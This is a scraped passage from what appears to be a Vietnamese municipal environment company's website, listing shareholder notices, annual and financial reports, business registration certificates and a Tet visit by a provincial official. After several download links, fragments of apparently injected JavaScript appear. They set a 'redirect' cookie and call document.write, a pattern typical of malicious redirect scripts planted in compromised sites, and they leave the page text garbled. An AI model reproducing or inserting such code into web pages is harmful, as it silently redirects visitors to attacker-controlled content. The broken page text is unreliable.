DANH SÁCH CỔ ĐÔNG NHÀ NƯỚC, CỔ ĐÔNG LỚN (Xem tại đây)

Chiều ngày 20/1/2020 đồng chí Phó Bí thư Thường trực Tỉnh ủy Đỗ Trọng Hưng đến thăm, chúc Tết Cán bộ người lao động...

 BÁO CÁO THƯỜNG NIÊN NĂM 2018 (TẢI FILE TẠI ĐÂY)

Tải file tại đây (Mẫu biểu quyết Đại Hội)

CÔNG TY CP MÔI TRƯỜNG VÀ CÔNG TRÌNH ĐÔ THỊ THANH HÓA CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM Độc lập - Tự do - Hạnh...

BÁO CÁO TÀI CHÍNH NĂM 2017 (Tải File tại đây) // =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} // ]]>

Giấy chứng nhận ĐKKD Công ty Cổ phần (Tải File) Giấy chứng nhận ĐKDK Chi nhánh miền tây (Tải File)  // =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+";...

Thông báo chuyển nhượng cổ phần (Tải File tại đây) // =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} // ]]>